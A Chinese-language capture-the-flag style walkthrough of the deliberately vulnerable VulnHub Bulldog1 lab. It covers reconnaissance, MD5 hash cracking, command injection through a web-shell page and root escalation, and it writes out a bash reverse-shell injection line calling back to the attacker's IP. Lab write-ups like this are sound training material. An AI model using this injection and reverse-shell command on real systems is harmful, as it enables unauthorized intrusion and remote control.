vulnhub靶场,bulldog1

环境准备

靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/
攻击机:kali(192.168.109.128)
靶机:bulldog1(192.168.109.157)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.157
使用nmap扫描查看目标靶机端口开放情况

开放端口:23、80、8080
可以开到目标靶机将ssh端口换成了23
浏览器访问目标靶机80端口

翻译其中内容是说此网站已经被黑了,查看源代码也没有发现什么
点击Public Notice跳转到了另一个页面

查看源代码也没有发现什么
网站指纹识别

使用dirb进行网站目录结构扫描

先只观察一下一级目录,访问/admin网页

看来是Django的后台管理登录页面,使用暴力破解和SQL注入均无效
访问/dev网页

中间有个web-shell,点击试试

看来必须要登入后台才能进入这个页面,回到上个页面,翻译一下

这里说不确定黑客有没有留下什么痕迹,可能是在提醒我们,看看源代码里面有没有什么东西

果然在源代码里发现了一些加密后的数据,猜测使用了md5进行加密

渗透过程

将这个md5加密后的密文放到解密网站依次进行猜解







成功破解出两个密码,再根据源码前面的对应关系得到两个账号密码,分别是:nick:bulldog,sarah:bulldoglover
再次找到后台登录的地方,使用这两个账号试试能不能登录

可以看到nick用户成功登入后台
再次回到那个webshell的位置

看来这里应该是一个命令执行的位置,输出上面给的命令试试

确实是这样,那可以试着加管道符运行我们想运行的命令

可以看到,运行成功了,那现在就可以反弹shell了
kali终端:

靶机中:

ls&echo "bash -i >& /dev/tcp/192.168.109.128/4444 0>&1" | bash


可以看到kali这边成功反弹回来了一个shell

提权过程

查看用户的sudo权限

没有sudo权限,进入家目录

发现一个bulldogadmin文件,进去看看

又发现一个.hiddenadmindirectory文件
再进去看看

又发现了一个customPermissionApp文件,查看其内容

发现一堆乱码,用strings命令用来提取和显示非文本文件中的文本字符串

猜测可能是密码,应为SUPER、 ulitimate、PASSWORD、youCANTget, 可以把他们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,中间刚好有PADDWORD
使用su命令切换为root用户

这里发现不能使用su命令,这里报的错误是必须要从终端运行,那使用python打开一个新的终端,使用sudo -i命令试试

可以看到成功切换为root用户,查看当前文件夹,成功获得flag,靶机bulldog1渗透结束

vulnhub靶场,bulldog1相关推荐

  1. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  2. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  3. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  4. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  5. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  6. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  7. vulnhub靶场,FirstBlood

    vulnhub靶场,FirstBlood 环境准备 靶机下载地址:https://www.vulnhub.com/entry/firstblood-1,564/ 攻击机:kali(192.168.10 ...

  8. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

  9. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

最新文章

  1. 查看计算机用户创建时间,敬业签在电脑端怎样查看团签内容的创建时间?
  2. 【MM模块】Procurement for Stock Material 库存型物料采购相关
  3. HTML的相关路径与绝对路径的问题---通过网络搜索整理
  4. CCF201412-1 门禁系统
  5. oracle asm 概念,ORACLE之ASM概念
  6. Linux防火墙配置与管理(16)
  7. Sublime Text for Mac如何支持GBK编码
  8. Java入门第65课——根据周长计算不同形状图形的面积
  9. Xilinx ZYNQ Ultrascale+ 性能测试之 Video Multi Scaler (Linux篇)
  10. 图片怎么无损放大?不影响清晰度这么做
  11. 中企海外周报 | 传祺GM6将亮相北美车展,锦江都城发力布局全球
  12. PHP EOF使用说明
  13. 微信小程序style的动态样式使用-三元表达式
  14. 极品特效HTML5动画推荐,不看的程序员后悔一辈子
  15. cath数据库fasta备注_sam's note
  16. 易事特拟8600万元投资山东潍坊临朐县光伏扶贫BOT项目
  17. 合泰lcd的c语言程序,合泰单片机HT66F70A LCD12864液晶屏驱动 汇编和c语言都有
  18. IPHONE省电省流量技巧 电池状况查询
  19. 闪电邮新建html模板,非常靠谱之网易智能版闪电邮6大新功能评测
  20. linux所有信号,【转载】Linux 信号列表

热门文章

  1. 利用Docker 映射到主机端口 32768 ,通过浏览器访问web应用失败
  2. 学习笔记-Hadamard矩阵的Kronecker积
  3. php示例代码之使用MySQLi接口
  4. 出现“性能监视器计数器要求”错误的解决办法
  5. 2019数学建模国赛总结
  6. 关于mysql的行转列问题
  7. C入门学习之水仙花数个人总结
  8. 16个用于数据科学和机器学习的顶级平台
  9. IE 凉了?怎么可能!
  10. 微信小游戏和小程序的区别